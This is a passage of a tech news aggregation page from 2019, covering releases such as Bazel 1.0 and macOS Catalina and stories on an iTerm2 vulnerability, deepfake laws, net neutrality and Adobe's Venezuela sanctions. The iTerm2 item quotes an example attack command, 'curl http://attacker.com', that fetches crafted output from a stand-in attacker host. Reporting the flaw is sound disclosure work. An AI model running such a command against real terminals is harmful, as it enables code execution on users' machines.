Tech News

The Bazel team announced the release of Bazel 1.0, last week. The team calls this version a “stability milestone” as it tries to address the stability concerns associated with Bazel by switching to semantic versioning. Along with this change, Bazel 1.0 features new genrule support, C++ and Java-related improvements, gRPC connections with default TLS enabled, and more. Bazel is the open-source version of the Blaze tool that Google uses internally. It is a polyglot build system that enables you to automate software building and testing. It provides features like reproducibility via sandboxing, distributed caching, static analysis of build dependencies, uniform CLI for builds and tests, and more. Key updates in Bazel 1.0 Windows A genrule generates one or more files based on a user-defined Bash command. Starting with Bazel 1.0, genrule supports cmd_bash, cmd_ps, and cmd_bat attributes for better integration on Windows. You can now get a new generated DEF file from the def_file output group of cc_library. Execution Previously, tags were not being propagated from a Bazel’s target to the action’s execution requirements. In Bazel 1.0, this is possible with the help of the --experimental_allow_tags_propagation flag. A rule consists of a series of actions that Bazel performs on inputs to produce a set of outputs. Now all rules have a default exec_properties attribute just like the one on a platform rule. Starting with Bazel 1.0, all gRPC connections from Bazel will have TLS enabled by default. You can disable TLS by going to the grpc:// scheme in your URIs. Configurability The config_setting general rule matches an expected configuration state for the purpose of triggering configurable attributes. With Bazel 1.0 release, it can now check multiple values on "--foo=firstVal --foo=secondVal ..."-style flags. This release comes with --enable_platform_specific_config that enable flags in bazelrc according to your host platform. C++ The cc_* rules now support non-transitive defines via a local_defines attribute. This attribute returns the set of defines needed to compile a particular target. Bazel 1.0 comes with support for ThinLTO builds, the new link-time optimization (LTO) compilation type, on Linux for Clang versions 6.0 or above. You can enable ThinLTO via --features=thin_lto. Java The Java-Starlark API, java_common.create_provider is now removed. Also, the JavaInfo() legacy arguments including actions, sources, source_jars, use_ijar, java_toolchain, and host_javabase are removed. Starting with Bazel 1.0, maven_jar and maven_server do not permit the use of plain HTTP URLs without a specified checksum. If you are using maven_jar it recommends switching to rules_jvm_external for transitive dependency management. The team has also advised that developers check the compatibility of their codebase by running bazelisk --migrate or by building their code with Bazel 0.29.1 and a list of flags before they upgrade to Bazel 1.0. These were some of the updates in Bazel 1.0. Check out the official announcement to know what else has shipped in this release. Rust 1.38 releases with pipelined compilation for better parallelism while building a multi-crate project Pivotal open sources kpack, a Kubernetes-native image build service Mozilla releases WebThings Gateway 0.9 experimental builds targeting Turris Omnia and Raspberry Pi 4 Introducing Weld, a runtime written in Rust and LLVM for cross-library optimizations LLVM 9 releases with official RISC-V target support, asm goto, Clang 9, and more

On Friday, Libc++ version 9 was released; libc++ is an implementation of the C++ standard library, targeting C++11, C++14 and above. Libc++ 9 is a part of the LLVM Compiler Infrastructure, release 9.0.0 which was made available in September. Libc++ 9 adds explicit support for WebAssembly System Interface (WASI) along with major improvements from the previous release and new feature work. Libc++ has also dropped support for GCC 4.9; they now support GCC 5.1 and above. WASI is a system interface for the WebAssembly platform. Currently, it supports sandboxed access to the filesystem via a POSIX-like API, as well as other basic interfaces like argv, environment variables, random numbers, and timers. There are three popular implementations of WASI: wasmtime, Mozilla’s WebAssembly runtime, Lucet, Fastly’s WebAssembly runtime, and a browser polyfill. Improvements in Libc ++ 9 Minor fixes to std::chrono operators. libc++ now correctly handles Objective-C++ ARC qualifiers in std::is_pointer. Front and back methods are added to std::span std::to_chars now adds leading zeros. Ensure std::tuple is trivially constructible. std::aligned_union now works in C++03. Output of nullptr to std::basic_ostream is formatted properly. P0608 is now implemented as a sane variant converting constructor. std::is_unbounded_array and std::is_bounded_array added to type traits. std::atomic now includes many new features and specialization Added std::midpoint and std::lerp math functions and std::is_constant_evaluated function Erase-like algorithms now return size type. Added contains method to container types. std::swap is now a constant expression. std::move and std::forward now both work in C++03 mode. People on Twitter were quite happy with WASI support in libc ++ https://twitter.com/Stephen_d2005/status/1178489876070535168 https://twitter.com/iwillrunoutofsp/status/1182702301062008832 You can also see the release notes for additional information. Introducing Weld, a runtime written in Rust and LLVM for cross-library optimizations LLVM 9 releases with official RISC-V target support, asm goto, Clang 9, and more LLVM’s Clang 9.0 to ship with experimental support for OpenCL C++17, asm goto initial support and more. LLVMs Arm stack protection feature turns ineffective when the stack is re-allocated

Yesterday, Mozilla announced that a critical security vulnerability is present in the terminal multiplexer (tmux) integration feature in all the versions of iTerm2, the GPL-licensed terminal emulator for macOS. The security vulnerability was found by a sponsored security audit conducted by the Mozilla Open Source Support Program (MOSS) which delivers security audits for open source technologies. Mozilla and the iTerm2’s developer George Nachman have together developed and released a patch for the vulnerability in the iTerm2 version 3.3.6. Read Also: MacOS terminal emulator, iTerm2 3.3.0 is here with new Python scripting API, a scriptable status bar, Minimal theme, and more According to the official blog post, MOSS sponsored the iTerm2 security audit due to its popularity among developers and system administrators. Another major reason was the iTerm2’s processing of untrusted data. Radically Open Security (ROS), the firm that conducted the audit, has ascertained that this vulnerability was present in iTerm2 for the last 7 years. An attacker can exploit this vulnerability (CVE-2019-9535) by producing a malicious output to the terminal using commands on the targeted user’s computer or by remotely executing arbitrary commands with the privileges of the targeted user. Tom Ritter of Mozilla says, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.” Nachman says that this is a serious vulnerability because “in some circumstances, it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2.” He also strongly recommended all the users to upgrade their iTerm2 to the latest 3.3.6 version. The CERT Coordination Center has pointed out that since the tmux integration cannot be disabled through configuration, the complete resolution to this vulnerability is not yet available. Users have appreciated both Mozilla and the iTerm2 team for the security update. A user commented on Hacker News, “I checked for update, installed and relaunched... and found that all my tabs were exactly as they were before, including my tab that had an ssh tunnel running. The only thing that changed was that iTerm got more secure. Impressive work, Nachman.” Another user says, “Thank you, Mozilla. =)” Visit the Mozilla blog for more details about the vulnerability. Apple’s MacOS Catalina in major turmoil as it kills iTunes and drops support for 32 bit applications Apple iPadOS now available for download with Slide Over and Split View, Home Screen updates, new capabilities to Apple Pencil and more Apple releases Safari 13 with opt-in dark mode support, FIDO2-compliant USB security keys support, and more! The US, UK, and Australian governments call Facebook’s end-to-end encryption plan a hindrance to investigating crimes An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack

A few days ago, Amazon announced the general availability of the Windows Container support on  Amazon Elastic Kubernetes Service (EKS). The company announced a preview of the Windows Container support in March this year and also invited customers to try it out and provide their feedback. With the Windows Container Support, development teams can now deploy applications designed to run on Windows Servers, on Kubernetes alongside Linux applications. It will also bring in more consistency in system logging, performance monitoring, and code deployment pipelines. “We are proud to be the first Cloud provider to have General Availability of Windows Containers on Kubernetes and look forward to customers unlocking the business benefits of Kubernetes for both their Windows and Linux workloads,” the official post mentions. A few considerations before deploying the Worker nodes include: Windows workloads are supported with Amazon EKS clusters running Kubernetes version 1.14 or later. Amazon EC2 instance types C3, C4, D2, I2, M4 (excluding m4.16xlarge), and R3 instances are not supported for Windows workloads. Host networking mode is not supported for Windows workloads. Amazon EKS clusters must contain 1 or more Linux worker nodes to run core system pods that only run on Linux, such as coredns and the VPC resource controller. The kubelet and kube-proxy event logs are redirected to the Amazon EKS Windows Event Log and are set to a 200 MB limit. In a demonstration, Martin Beeby, a principal evangelist for Amazon Web Services has created a new Amazon Elastic Kubernetes Service cluster, which works with any cluster that is using Kubernetes version 1.14 and above. He has also added some new Windows nodes and deploys a Windows application. For a complete demonstration and to know more about the Amazon EKS Windows Container Support, read AWS’ official blog post. Amazon EBS snapshots exposed publicly leaking sensitive data in hundreds of thousands, security analyst reveals at DefCon 27 Amazon is being sued for recording children’s voices through Alexa without consent Amazon Managed Streaming for Apache Kafka (Amazon MSK) is now generally available

Yesterday, Apple released MacOS Catalina, its latest update for Macs and MacBooks. The new operating system can be installed from the homepage of its App Store. Catalina brings a host of new features, including the option to use apps from the iPad as well as turn the tablet into an additional display for computers. But this new update kills iTunes and faces some major issues. Apple has confirmed that there are some serious issues in MacOS Catalina, and affected consumers should refrain from updating the OS until these issues are addressed. Catalina is finally the download that kills iTunes, which is nowhere to be found in the new update. Instead, Apple has moved the features of iTunes into their own separate Music app, the new update also includes separate apps for Podcasts and TV. MacOS Catalina update is a big problem for DJs who rely on iTunes The Mac platform is especially popular with DJs, who cart around MacBook Pro machines jam-packed with music, playlists, mixes and specialist software to allow them to perform every evening. These have been tied to iTunes’ underlying XML database. But after nearly 2 decades, iTunes are discontinued in macOS Catalina, and the XML file no longer exists to index a local music collection. This has broken popular and niche music tools alike, including some of the major titles such as Traktor and Rekordbox. The Verge reports that Apple has confirmed that this issue is down to its removal of the XML file, but is handing responsibility to the third-party developers behind each app. Unfortunately, for Apple’s reputation, those developers have been expecting the ability for the new standalone Music app to explore an XML file, a feature Apple suggested would be available until they could code around the lack of XML. Fact Mag also reported, “this news contradicts Apple’s earlier assertion that there would be a way to manually export the XML file from the new Music app, though Catalina’s launch yesterday now proves this isn’t the case at all.” Apple advice DJs that, if you rely on a software that needs this XML file to function, then do not update to Catalina until individual developers have issued compatibility updates for the new operating system. Catalina drops support for 32-bit applications and faces other issues as well Catalina also drops support for 32-bit applications. The 32-bit applications will simply not run under the new system, this version of macOS is a 64-bit only. If you are a Mac user that is reliant on a 32-bit app, then you have just a single dialog on installation that warns of the loss of support. And with these there are other questions which a user will need answers to like, you would need to know which of your apps are 32-bit and which are 64-bit? And if they are mission-critical in your role and is a 64-bit alternative available? It's not just this, a number of creative tools, including Apple Aperture, Microsoft Office 2011 and Adobe CS6 are also experiencing issues with Catalina. Additionally, there are issues with font in MacOS Catalina, as per the Chromium blog, the macOS system font appears "off" -- too light / tight kerning. It is clear that Apple wants to push forward with its platforms, but it needs to remember that the hardware has to work in the real world today. Apple should be consistent in what features it offers, it should provide clear and accurate information to developers and users, and it should ensure the very least that its own store is in order. TextMate 2.0, the text editor for macOS releases MacOS terminal emulator, iTerm2 3.3.0 is here with new Python scripting API, a scriptable status bar, Minimal theme, and more Apple previews macOS Catalina 10.15 beta, featuring Apple music, TV apps, security, zsh shell, driverKit, and much more! WWDC 2019 highlights: Apple introduces SwiftUI, new privacy-focused sign in, updates to iOS, macOS, and iPad and more Apple plans to make notarization a default requirement in all future macOS updates

Yesterday, the California bans political deepfakes, government passed a law that makes it illegal to distribute deepfakes or deceptively edited videos and audio clips intended to damage a politician’s reputation or deceive someone into voting for or against a candidate. Last week, the Governor of California, Gavin Newsom signed a law AB 730, which states that it is a crime to distribute audio or video that gives a false, damaging impression of a politician’s words or actions. The law applies to any candidate within 60 days of an election, but also includes exceptions. For example, the news media will be exempted from the requirement, and the videos made for satire or parody will also be exempted. Potentially deceptive video or audio will also be allowed if it includes a disclaimer noting that it’s fake. It also states that the law will sunset in 2023. Marc Berman, a Democratic member of the California state assembly and chair of the Elections and Redistricting Committee, explained that he was motivated to introduce AB 730 ahead of the 2020 election due to concerns about voter manipulation: “Deepfakes are a powerful and dangerous new technology that can be weaponized to sow misinformation and discord among an already hyper-partisan electorate,” he said in a statement. “Deepfakes distort the truth, making it extremely challenging to distinguish real events and actions from fiction and fantasy.” https://twitter.com/AsmMarcBerman/status/1181689932693168129   Challenges likely for California bans political deepfakes Challenges are likely to arise in the enforcement of this legislation of California bans political deepfakes, given the extremely realistic nature of deepfake content. The legislation could also face legal challenges from groups citing the First Amendment right to free political expression; the American Civil Liberties Union and the Electronic Frontier Foundation have criticized the law for potentially harming political speech. At the same time Newson also signed in another bill, AB 602, that will allow victims of deepfake pornography to seek legal compensation if their image is manipulated for sexually explicit purposes without their consent. This law came into effect in connection with a recent report conducted by cybersecurity firm Deeptrace – which offers deepfake detection tools – estimated that 96% of deepfakes are pornographic, with 99% of them featuring women from the entertainment industry. “When deepfake technology is abused to create sexually explicit material without someone’s permission, it can cause irreparable harm to a victim’s reputation, job prospects, personal relationships and mental health,” Berman said. “Women are disproportionately being harassed and humiliated when their photos are scraped from the internet and seamlessly grafted into pornographic content.”, he added. On Hacker News, users are discussing that such state laws of California bans political deepfakes will not be able to change anything at a grass root level and propogandas will exist in one form or another. One of them commented, “Propaganda will always exist in one form or another. State law is not going to change that or even put a dent in it. The only decent option to fight propaganda is through the education system. The incoming generations should be armed with sharp critical thinking skills, common sense, and empathy (this one is especially important). There needs to be more demonstrative sessions in classrooms where students actively participate in distinguishing fake content from real ones (and specifically how they can deem it to be fake). My kid's public school does an ok job at teaching the above skills on a surface level, but it comes off as an afterthought as opposed to a primary lesson. I wish they would take it to a more granular level and make it a primary aspect of education.” Update on 11th Oct, 2019 California Governor Gavin Newsom has signed into law gig worker protections bill AB-5. This comes shortly after AB-5 passed in the California State Assembly and Senate. https://twitter.com/ssmith_calabor/status/1182482321695395840 “Today, we are disrupting the status quo and taking a bold step forward to rebuild our middle class and reshape the future of workers as we know it,” bill author and Assemblyperson Lorena Gonzalez said in a statement. “As one of the strongest economies in the world, California is now setting the global standard for worker protections for other states and countries to follow.” AB-5 will help to ensure gig economy workers are entitled to minimum wage, workers’ compensation and other benefits by requiring employers to apply the ABC test. The bill, first introduced in December 2018, aims to codify the ruling established in Dynamex Operations West, Inc. v Superior Court of Los Angeles. In that case, the court applied the ABC test and decided Dynamex wrongfully classified its workers as independent contractors. How hackers are using Deepfakes to trick people Deepfakes House Committee Hearing: Risks, Vulnerabilities and Recommendations Lawmakers introduce new Consumer privacy bill and Malicious Deep Fake Prohibition Act to support consumer privacy and battle deepfakes Facebook research suggests chatbots and conversational AI are on the verge of empathizing with humans How to handle categorical data for machine learning algorithms

Yesterday, the Thunderbird developers announced to implement OpenPGP support in Thunderbird 78, which is planned to be a Summer 2020 release. This means that the support for Thunderbird in Enigmail will be discontinued. Enigmail is a data encryption and decryption extension for Mozilla Thunderbird and SeaMonkey internet suite that provides OpenPGP public key email encryption and signing. Patrick Brunschwig, the lead developer of the Enigmail project, says “this is an inevitable step.” The Mozilla developers have been and still are actively working on removing old code from their codebase. This affects not only Thunderbird but also add-ons. “While it was possible for Thunderbird to keep old "legacy" add-ons alive for a certain time, the time has come for Thunderbird to stop supporting them,” Brunschwig added. Thunderbird is unable to bundle GnuPG software due to incompatible licenses (MPL version 2.0 vs. GPL version 3+). Instead of relying on users to obtain and install external software like GnuPG or GPG4Win, the developers intend to identify and use an alternative, compatible library (Thunderbird 78), and distribute it as part of Thunderbird on all supported platforms. Will OpenPGP support in Thunderbird 78 mark an end to Enigmail? Brunschwig, in an email thread, writes that he “will continue to support and maintain Enigmail for Thunderbird 68 until 6 months after Thunderbird 78 will have been released (i.e. a few months beyond Thunderbird 68 EOL).”  He further mentioned that Enigmail will not run anymore on Thunderbird 72 beta and newer. Thunderbird 78 will no longer support the APIs that Enigmail requires and only allow new "WebExtensions". WebExtensions have a completely different API than classical add-ons, and a much-reduced set of capabilities to the user interface. Enigmail will not end; however, it will continue to maintain and support Enigmail for Postbox, which is running on a different release schedule than Thunderbird for the foreseeable future. “The Thunderbird developers and I have therefore agreed that it's much better to implement OpenPGP support directly in Thunderbird. The set of functionalities will be different than what Enigmail offers, and at least initially likely be less feature-rich. But in my eyes, this is by far outweighed by the fact that OpenPGP will be part of Thunderbird and no add-on and no third-party tool will be required,” Brunschwig writes. To process OpenPGP messages, GnuPG stores secret keys, public keys of correspondents, and trusted information for public keys in its own file format. Thunderbird 78 will not reuse the GnuPG file format, but will rather implement its own storage for keys and trust. Users who already own secret keys from their previous use of Enigmail and GnuPG, and who wish to reuse their existing secret keys, will be required to transfer their keys to Thunderbird 78. On systems that have GnuPG installed, the team may offer assisted importing. Many users are awaiting the summer release next year. https://twitter.com/robertjhansen/status/1181561188301320192 https://twitter.com/glynmoody/status/1181550756916334592 ZDNet writes, “What Mozilla devs will do remains to be seen, and they might end up creating a new OpenPGP library from scratch -- which might take up a lot of Mozilla's resources but will be a win for the open-source community as a whole.” To know more about this news in detail, read Mozilla Wiki. Cloudflare and Google Chrome add HTTP/3 and QUIC support; Mozilla Firefox soon to follow suit Mozilla introduces Neqo, Rust implementation for QUIC, new http protocol Mozilla proposes WebAssembly Interface Types to enable language interoperability

Yesterday, reports from 9to5 Google says that as per the updated Google Mobile Services (GMS) agreement. Per the new terms, OEMs who utilize their own gesture navigation systems cannot have those available in the device's initial setup if it ships with Android 10. Google has struggled to devise a new navigation system for Android over the last few releases. The two-button design from Pie is not liked much in the market, and the new full-gesture setup in Android 10 also has its critics. However, with the new agreement, you will see a lot of Google's gestures in the upcoming new Android 10 devices. At this year’s Google I/O 2019, the company announced that it would support the new gestures and the three-button navbar going forward. It didn't rule out OEMs having their own custom gesture navigation and will indeed let them keep those, but there will be some restrictions. Notably, devices shipping with Android 10 will need to have either classic three-button nav or Google's gesture navigation enabled out of the box. This makes it sound like the two-button "pill" setup will be effectively dead. Android 10 devices will not offer custom navigation in the initial setup Phones often let users choose their navigation options during setup, but Android 10 will not offer custom gesture navigation as an option in the setup wizard at all. So, you'll probably be able to turn on Google's gestures, but something like Samsung's swipe-up targets (see below image) will only be available if you dig into the settings. Source: 9to5 Google Hence, the updated Google Mobile Services agreement puts into perspective what Google really wants for Android users. Manufacturers can still include their own navigation solutions, but those solutions aren’t to be immediately available to the users during the setup wizard. Users must go into the device settings to toggle alternative navigation systems after the initial setup. Not only are OEM-specific navigation systems not allowed during setup, but manufacturers can’t even prompt users to use them in any way. No notifications. No pop-ups or any other way. Also, Google also requires OEMs to hide their custom navigation systems deeper into the settings. Manufacturers can put these settings under new sections like “advanced” or something similar, not easily accessible to the user. This isn’t necessarily a bad call by Google. More uniformity throughout the Android ecosystem can only be a good thing. The gestures will mature quicker, apps will be forced to adhere to the new navigation systems, and users will get used to it more easily. Google Mobile Services requires new Android devices compatible with Type-C ports The new Google Mobile Services agreement also outlines the technical requirements that smartphone device makers must meet in order to preload Google Mobile Services. Nearly every Android smartphone or tablet sold internationally have met these requirements because having access to Google apps is critical for sales outside of China. A subsection 13.6 of this document is titled “USB Type-C Compatibility” which states: “New DEVICES launching from 2019 onwards, with a USB Type-C port MUST ensure full interoperability with chargers that are compliant with the USB specifications and have the USB Type-C plug.” On Reddit, this news has got significant traction and Android users are discussing that this move by Google is good only if the gesture usage works well. Here are some of the comments, “Im sure people will hate this, but im for easier usage for the general public.” Another user responds, “Sure. As long as the gesture usage works really, really well. If it doesn't, this is a bad move.” Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices Google’s DNS over HTTPS encryption plan faces scrutiny from ISPs and the Congress Google Chrome Keystone update can render your Mac system unbootable Google’s V8 JavaScript engine adds support for top-level await Google announces two new attribute links, Sponsored and UGC and updates “nofollow”

There is a new operating system in the market which is designed in anticipation of the collapse of the current economic system - Collapse OS. The goal of this project is “to be as self-contained as possible.” With a copy of this project, its developer Virgil Dupras says, a capable person will be able to easily build and install Collapse OS without external resources. It will also be possible to build a machine with an exclusive design, and from discarded parts with low-tech tools. Dupras believes that the global supply chain will collapse before 2030 and post-collapse, it would be difficult to reproduce most of the electronics due to lack of supply chain. This will make it impossible to bootstrap the new electronic technology and thus limit its growth. At this point, Dupras says, Collapse OS can prove to be a good “starter kit”. He affirms that this operating system can be designed from “scavenged parts and program microcontrollers” with sufficient RAM and storage. Basically, Collapse OS is a z80 kernel, with a collection of programs, tools, and documentation to assemble an operating system. It can run on minimal and improvised machines and enables interfacing through improvised means like serial, keyboard, display. The Collapse Operating System can edit text and compile assembler source files for a wide range of microcontrollers and CPUs. It can also read and write from a wide range of storage devices and replicate itself. What is the current status of Collapse OS? Collapse OS is built from a GNU environment with minimal tooling and only requires libz80, which is an emulator of the z80 processor. It also has a shell that can poke memory, I/O, call arbitrary code from memory. It can also read SD cards and has a text editor modeled after UNIX's ed. Two days ago, a 5K binary zasm with a 2400 SLOC and 8K RAM usage was added in the apps, with an aim to assemble kernel or itself. Currently, Collapse OS can run on an RC2014 through a serial link with a directly plugged in PS/2 keyboard. It also runs on a Sega Master System or a MegaDrive (Genesis) with video output and D-Pad input and/or a PS/2 keyboard adapter. The unique concept of Collapse OS has led to an informative discussion on Hacker News. One of the queries included the availability of a rad-hardened version of z80. A user answered, “Given the relative simplicity of a z80 compared to newer CPU designs, it should be relatively "easy" to harden it. There was definitely a rad-hardened version of the 8085 (similar to the 8080, and therefore to the z80), which was used on the Sojourner rover (among various other NASA and ESA spacecraft). Seems like RISC processors were more common for this, though (looks like most relatively-recent NASA spacecraft - including pretty much all of NASA's Mars landers after Sojourner - use(d) rad-hardened POWER CPUs, e.g. the RAD6000 and RAD750).” Many users have found the concept of Collapse OS interesting. https://twitter.com/thepanta82/status/1181395008827645952 https://twitter.com/bradneuberg/status/1181273072759762944 https://twitter.com/EvanWard97/status/1181452898296832000 https://twitter.com/indigocat/status/1181297674408124418 A Redditor says, “This is so insanely cool, definitely the coolest project I have seen in a while. I am dry interested in minimal software (void Linux and suckles fanatic) but this is taking it to a new level. I have a ton of respect for people who work on projects geared towards more advanced users, I know that most of the time it’s a thankless job but please, for the love of god keep it up. We need more devs like this in the world!” Read the Collapse OS roadmap page for more information. You can also check out its Github for more details. Understanding network port numbers, TCP, UDP, and ICMP on an operating system Google’s secret Operating System ‘Fuchsia’ will run Android Applications: 9to5Google Report macOS Catalina is now available for download FCC can’t block states from passing their own net neutrality laws, states a U.S. court The US, UK, and Australian governments call Facebook’s end-to-end encryption plan a hindrance to investigating crimes

The U.S. based software company Adobe Inc. announced yesterday that will be canceling all subscriptions and deactivating all accounts for Venezuelan users. This move from Adobe is to become compliant to U.S. Government's Executive Order 13884 issued on August 5, 2019. In the support document released yesterday, Adobe explains their decision and informs Venezuelans that they have until October 28 to download any files stored in their Adobe accounts, following which their accounts will be deactivated. https://twitter.com/AdobeCare/status/1181289777397735424 This Adobe ban will impact users of both free or paid Adobe services. The users will not be able to pay for new services, nor will they get any refunds as cited in Executive Order 13884. President Trump's new executive order, backed by the US Department of Treasury, bans US companies from having any business relations with Venezuelan entities, private companies, government organizations, non-profits, or individual citizens. According to PCMag, “Trump administration issued the sanction order against the government of Venezuelan President Nicolas Maduro for allegedly usurping the presidency and perpetrating human rights abuses against the country's citizens.” https://twitter.com/AenderLara/status/1181291242531020800 “Under Executive Order 13884, U.S. companies are severely restricted in the business it carries out within Venezuela. As a result, we are ceasing all activity with entities and individuals in Venezuela as well as those who otherwise meet the criteria of Executive Order 13884 or other U.S. sanctions regulations,” the support document mentions. "We apologize for the inconvenience," adds Adobe. The U.S. has also imposed similar bans on other countries including Iran, North Korea, and Syria. “Not all US companies follow these bans, but the bigger tech giants do follow US Treasury sanctions to the letter of the law,” ZDNet reports. This ban has sparked a lot of complaints from Adobe customers in Venezuela. https://twitter.com/faintenkiu/status/1181296289155293191 https://twitter.com/GRamsey_LatAm/status/1181288171562135552 A user on Hacker News commented, “What makes this even worse is that this is only a huge issue because Adobe moved to the whole 'Creative Cloud' thing rather than the old 'buy each product outright' model. With the old model, it wouldn't hurt these creators all that much if their accounts got deactivated since the software would just not get updates. Now on the other hand... they're screwed. It's a 'brilliant' example of how these 'cloud' based services are a bad deal for the user because it puts them at the risk of getting locked out their own purchases due to legal hassles like this.” Similar to Adobe, in July, Microsoft started enforcing the US Treasury ban/sanctions list on GitHub, a service it bought last year. FCC can’t block states from passing their own net neutrality laws, states a U.S. court “621 U.S. government, schools, and healthcare entities are impacted by ransomware attacks since January’19”, highlights Emisoft report Facebook must face privacy class action lawsuit, loses facial recognition appeal, U.S. Court of Appeals rules

Apple released macOS Catalina today as the next major update to the company’s Mac operating system. With macOS Catalina, iTunes is now broken into separate apps for Apple Music, Podcasts, and Apple TV. Catalina also features Apple Arcade game subscription service and Sidecar, which extends Mac desktops to a second display. For developers, Catalina has Mac Catalyst to build versions of iPad apps compatible with Mac. macOS Catalina was officially revealed in June at the WWDC 2019 and the public beta was released later in June. What’s new in macOS Catalina Sidecar Sidecar basically extends your Mac workspace by using an iPad as a second display-  both wirelessly and when plugged in. Sidecar also supports the Apple Pencil, letting you work on any Mac app or third-party Mac app that supports stylus input. According to an Apple white paper, the only laptops that Sidecar works on are: MacBooks from 2016 or later, MacBook Airs from 2018 or later, and MacBook Pros from 2016 or later. All of them use Apple’s butterfly keyboard. Addition of Apple Arcade Apple Arcade game subscription service is available at $4.99 per month to play games on Mac. Apple Arcade subscribers get the full version of every game including all updates and expansions, without any ads or additional in-game purchases. The service is launching with a 30-day free trial and a single subscription includes access for up to six family members with Family Sharing. iTunes replaced with new entertainment apps iTunes saw it’s long-awaited death and was replaced by three new apps, Apple Music, Apple Podcasts and Apple TV. Music app features over 50 million songs, playlists, and music videos. Apple Podcasts offers more than 700,000 shows in its catalog. Apple TV+, Apple’s video subscription service, will be available in the Apple TV app for Mac starting November 1 Removal of iTunes, however, is a problem for DJs who rely on XML files to sort through file libraries and quickly find tracks while performing. According to Apple, along with Catalina’s removal of iTunes, users are also losing XML file support as all native music playback on Macs moves over to the official Music app, which has a new library format. https://twitter.com/danideahl/status/1181342504949633025 Additional features You also have Screen Time on macOS and stricter privacy protections. Apps will have to ask for permission to access the desktop, documents, iCloud Drive, and external storage. With activation lock, any Macs that have a T2 security chip cannot be erased and reactivated without Apple ID password. ‘Find My App’ combines ‘Find My iPhone’ and ‘Find My Friends’ into a single, easy-to-use app on Mac, iPad, and iPhone. Mail in macOS Catalina adds the ability to block email from a specified sender, mute an overly active thread and unsubscribe from commercial mailing lists. The macOS Catalina update is a free download, and it can be installed by clicking on the Apple icon in the upper left corner of your screen, choosing system preferences, and then selecting software update. Apple bans HKmap.live, a Hong Kong protest safety app from the iOS Store as it makes people ‘evade law enforcement’. Apple iPadOS now available for download with Slide Over and Split View, Home Screen updates, and more. Apple’s September 2019 Event: iPhone 11 Pro and Pro Max, Watch Series 5, Apple TV+ and more

In November last year, Mozilla filed a case against the FCC (Federal Communications Commission), opposing their decision of retracting the net neutrality protection rules. This was in the order of FCC’s decision to classify the ISPs as Title II (common carrier services) service providers under the Communications Act of 1934. The Title II classifier, unlike Title I, allowed the FCC to have regulatory power over the ISPs. On the other hand, Mozilla and other companies, trade groups, states, and organizations protested this decision as an unethical move by FCC. [box type="shadow" align="" class="" width=""]Net neutrality compels ISPs to treat all the data on the internet as equal. This means that all the data on the internet should be presented at the same rate, without any discrepancy. In a non-net neutrality scenario, the ISPs can create data in fast and slow lanes, block sites, or even charge companies more money to prioritize their content.[/box] Read Also: The future of net neutrality is being decided in court right now, as Mozilla takes on the FCC The latest development in this issue came last week when a U.S. court of appeals for the D.C. Circuit supported the FCC’s decision of revoking the net neutrality rules. The Chairman of the FCC, Ajit Pai, lauded this decision and asserted it as a victory for consumers and broadband deployments. He added, “The court also upheld our robust transparency rule so that consumers can be fully informed about their online options. Since we adopted the Restoring Internet Freedom Order, consumers have seen 40% faster speeds and millions more Americans have gained access to the Internet.” https://twitter.com/AjitPaiFCC/status/1179046254833262597 States can pass their own net neutrality laws Notably, the court has also restricted FCC from preemptively ceasing the states from adopting their own, stricter rules. According to Mozilla, the three-judge panel disagreed with FCC’s argument about preempting state net neutrality legislation across the board. The judges affirmed, “States have already shown that they are ready to step in and enact net neutrality rules to protect consumers, with laws in California and Vermont among others.”  https://twitter.com/mozilla/status/1179107413699497984 This rule paves the way for the 34 U.S. states who have already introduced or passed net neutrality rules. Last year, California’s legislature had passed the Internet Consumer Protection and Net Neutrality Act of 2018 which is dubbed as the strongest net neutrality law in the country. The bill bans internet providers from blocking and throttling legal content and prioritizing sites or services over others. These restrictions are applied to both home and mobile connections. Soon after the bill was passed, the FCC and Department of Justice (DoJ) had filed lawsuits blocking its implementation. Following on the same lines, Vermont had also passed a bill to establish consumer protection and net neutrality standards applicable to internet service providers. However, the Vermont Attorney General’s Office has said that despite the federal appeals court giving states more power to regulate internet providers, the state will not be able to implement the law until the appeals process in the federal case is fully resolved. Verge reports that the judges on the panel criticized FCC for exhibiting “disregard of its duty” by not evaluating how its rule would affect public safety. The court has also asked the FCC to consider the impact that reclassification will have on pole attachments. It also added that the FCC has not sufficiently addressed the concerns about how the change would affect the Lifeline internet access program for low-income Americans. Commenting on allegations, Pai said that they are working on addressing “the narrow issues” that the court has identified. In a blog post, Mozilla said the court’s decision clearly “underscores the frailty of the FCC’s approach” as the judges have questioned the FCC’s reclassification of broadband internet access from a ‘telecommunications service’ to an ‘information service.’ Mozilla has maintained that they are looking forward to continuing this fight with the FCC. If either of the party now decides to appeal, Congress may have to step in to settle the issue. With the Democrats vowing to restore the protections and the Republicans opposing the bill, this battle may end up as a bipartisan compromise. Many U.S. Senators have extended their support for net neutrality on Twitter. https://twitter.com/SenatorBennet/status/1179070818267078656 https://twitter.com/SenMarkey/status/1179111199121772544 US Supreme Court ends the net neutrality debate by rejecting the 2015 net neutrality repeal allowing the internet to be free and open again Spammy bots most likely influenced FCC’s decision on net neutrality repeal, says a new Stanford study Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices The OpenJS Foundation accepts NVM as its first new incubating project since the Node.js Foundation and JSF merger An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack

Last week, the US, UK, and Australian governments wrote an open letter to Facebook urging it to drop end-to-end encryption from WhatsApp and halt its plans to implement end-to-end encryption across its other messaging platforms. The three governments asked the company to ensure “there is no reduction to user safety” and include “a means for lawful access to the content of communications to protect our citizens.” The open letter is addressed to Mark Zuckerberg, Facebook’s CEO and co-signed by US Attorney General William Barr, Acting Homeland Security Secretary Kevin McAleenan, United Kingdom Home Secretary Priti Patel, and Australia’s Minister for Home Affairs Peter Dutton. This open letter to Facebook comes after the launch of a new “UK-US Bilateral Data Access Agreement.” This agreement aims to speed up electronic data access requests by their respective law enforcement agencies. This replaces the current process called Mutual Legal Assistance that requires law enforcement agencies to submit a request and get it approved by central governments, which can often take months or even years. The new process will only take a few weeks or even days. Why the US, UK, and Australian governments are against end-to-end encryption The three governments stated that though they realize the importance of strong encryption in processing services such as banking and commerce, end-to-end encryption would hinder the investigation of serious 